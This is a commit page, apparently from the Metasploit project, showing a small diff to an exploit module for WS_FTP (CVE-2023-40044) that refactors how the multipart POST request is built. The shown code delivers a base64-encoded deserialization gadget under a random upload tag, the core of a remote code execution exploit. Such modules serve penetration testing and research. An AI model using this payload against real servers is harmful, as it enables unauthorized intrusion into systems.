leverage Rex::MIME::Message instead of creating the multipart data ma…

…nualy
rapid7 · Oct 4, 2023 · 8431d11 · 8431d11
1 parent ccd8c71
commit 8431d11
Showing 1 changed file with 7 additions and 14 deletions.
diff --git a/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb b/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
@@ -128,25 +128,18 @@ def exploit
     # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation.
     tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER]
 
-    boundary = rand_text_alphanumeric(8)
+    message = Rex::MIME::Message.new
 
-    data = "--#{boundary}\r\n"
-    data << "name: #{rand_text_alphanumeric(8)}\r\n"
-    data << "\r\n"
-    data << "::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n"
-    data << "--#{boundary}–\r\n"
-    data << "\r\n"
+    part = message.add_part("::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n", nil, nil, nil)
 
-    res = send_request_raw(
+    part.header.set('name', rand_text_alphanumeric(8))
+
+    res = send_request_cgi(
       {
         'uri' => normalize_uri(datastore['TARGET_URI']),
-        'headers' =>
-        {
-          'Content-Type' => 'multipart/form-data; boundary=' + boundary,
-          'Content-Length' => data.length
-        },
+        'ctype' => 'multipart/form-data; boundary=' + message.bound,
         'method' => 'POST',
-        'data' => data
+        'data' => message.to_s
       }
     )